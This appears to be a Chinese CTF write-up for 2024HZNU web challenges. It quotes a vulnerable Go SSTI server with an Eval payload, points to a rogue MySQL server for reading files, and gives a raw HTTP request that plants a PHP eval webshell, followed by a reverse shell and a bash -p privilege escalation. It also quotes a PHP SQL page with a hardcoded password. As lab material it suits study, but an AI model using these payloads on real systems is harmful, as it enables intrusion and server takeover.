2024HZNU

Web

ezSSTI

go的ssti

package main

import (
	"fmt"
	"net/http"
	"os/exec"
	"strings"
	"text/template"
)

type User struct {
	Id     int
	Name   string
	Passwd string
}

func (u User) Eval(command string) string {
	out, _ := exec.Command(command).CombinedOutput()
	return string(out)
}

func Login(w http.ResponseWriter, r *http.Request) {
	r.ParseForm()
	username := strings.Join(r.PostForm["name"], "")
	password := strings.Join(r.PostForm["passwd"], "")
	user := &User{1, username, password}
	tpl1 := fmt.Sprintf(`<h1>Hi, ` + username + `</h1> This is SSTI, please post your name and password`)
	html, err := template.New("login").Parse(tpl1)
	html = template.Must(html, err)
	html.Execute(w, user)
}

func main() {
	server := http.Server{
		Addr: "0.0.0.0:8080",
	}
	fmt.Print("Server is running on 0.0.0.0:8080")
	http.HandleFunc("/login", Login)
	server.ListenAndServe()
}

可以看到有一个Eval方法

直接

1	{{.Eval "env"}}

sql2login

注册登录就给flag

真亦假，假亦真(HZNU版)

给了马蚁剑链接base64记得选

直接找flag就好

Ezsql

伪造mySql

https://github.com/rmb122/rogue_mysql_server

修改rogue_mysql_server读取/flag

看文件日志得到flag

suid

写个马

POST /eval.php HTTP/1.1
a:file_put_contents("/var/www/html/1.php", '<?php eval($_POST[\'a\']); ?>');
Host: 150.158.117.224:20009
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://150.158.117.224:20009
Connection: close
Referer: http://150.158.117.224:20009/eval.php
Cookie: session=941b76c5-7378-4c4e-935b-de109c8c3cd4.sIvK9c1-BB8ynyUN-cvOxjlMfys; PHPSESSID=42bbc65394d19bbf549ac9abdd9f7e1d
Upgrade-Insecure-Requests: 1

s%5B1.1=1&cmd=eval(pos(getallheaders()));

蚁剑连上

弹个shell，

bash -p 提权

<?php
session_start();

// 定义数据库连接信息
$host = "localhost"; // 修改为实际的数据库主机名
$username = "root"; // 修改为实际的数据库用户名
$password = "asd222!!@332asc"; // 修改为实际的数据库密码
$dbname = ""; // 修改为实际的数据库名

$status = 0;

if (isset($_POST["host"])) {
  $host = $_POST["host"];
  $username = $_POST["username"];
  $password = $_POST["password"];
  $dbname = $_POST["dbname"];
} else {
  $host = $_SESSION["host"] ?? $host;
  $username = $_SESSION["username"] ?? $username;
  $password = $_SESSION["password"] ?? $password;
  $dbname = $_SESSION["dbname"] ?? $dbname;
  $status = 1;
}

// 连接数据库
$conn = new mysqli($host, $username, $password, $dbname);

// 检查连接
if ($conn->connect_error) {
  die("Connection failed: " . $conn->connect_error);
}

if ($status == 0) {
  $_SESSION["host"] = $_POST["host"];
  $_SESSION["username"] = $_POST["username"];
  $_SESSION["password"] = $_POST["password"];
  $_SESSION["dbname"] = $_POST["dbname"];
}
?>

<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Query</title>
  <style>
    form {
      width: 600px;
      margin: 0 auto;
    }

    label {
      display: block;
      margin-bottom: 10px;
    }

    input,
    textarea {
      width: 100%;
      padding: 10px;
      border: 1px solid #ddd;
      border-radius: 4px;
      font-size: 20px;
    }

    #submit {
      background: #3498db;
      color: white;
      padding: 10px;
      border-radius: 4px;
      cursor: pointer;
    }
  </style>
</head>

<body>
  <form method="post" action="query.php">

    <h2>Execute SQL</h2>

    <label for="sql">SQL Statement:</label>
    <textarea id="sql" name="sql" rows="5"></textarea>

    <input type="submit" id="submit" value="Submit">

  </form>

  <?php
  if (isset($_POST["sql"])) {
    $sql = $_POST["sql"];
    $result = $conn->query($sql);
    if ($result) {
      if ($result->num_rows > 0) {
        echo "<table>";
        while ($row = $result->fetch_assoc()) {
          echo "<tr>";
          foreach ($row as $key => $val) {